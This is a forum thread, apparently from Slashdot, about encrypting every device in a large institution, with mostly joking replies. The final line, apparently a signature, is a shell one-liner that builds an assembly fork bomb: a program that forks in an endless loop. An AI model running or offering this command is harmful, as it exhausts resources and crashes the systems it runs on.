How To, When You Have To Encrypt Absolutely Everything?
Dark Neuron writes "My institution has thousands of computers, and is looking at starting an IT policy to encrypt everything, all hard drives, including desktops, laptops, external hard drives, USB flash drives, etc. I am looking at an open source product for Windows, Mac, UNIX, as well as portable hard drives, but I am concerned about overhead and speed penalties. Does anyone have experience and/or advice with encrypting every single device in a similar situation?"
Let me explain to you how this works. In pictures:
http://xkcd.com/538/
Tired of Political Trolls? Opt Out!
Tell the suits you are implementing state-of-the art ROT-26 encryption on everything. Take a month off. Come back, pronounce it complete, and ask for a raise.
SpyDock: Scientific Python in a Docker container
An elaborate system of Post It Notes (All ROT13'd)
Maybe its just the corporate environment that I'm in and please I would love to be wrong. But from what I can tell a good number of open sourced products just don't scale up to the enterprise level.
There aren't any tools that manage them centrally and allow for compliance and auditing.
Crap. Has anyone told Google yet? Best get them to switch to Windows quickly!
To empower individuals to utilize synergistic approaches to achieve goals and exceed expectations. :)
Plase back everything up frist! Send it to us at editor@wikileaks.org and we'll store that data for you for free. We have mirror sites to protect the data; just send it before encrypting it.
Coming from an Org that encrypts everything
Tom Cruise? Is that you?
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;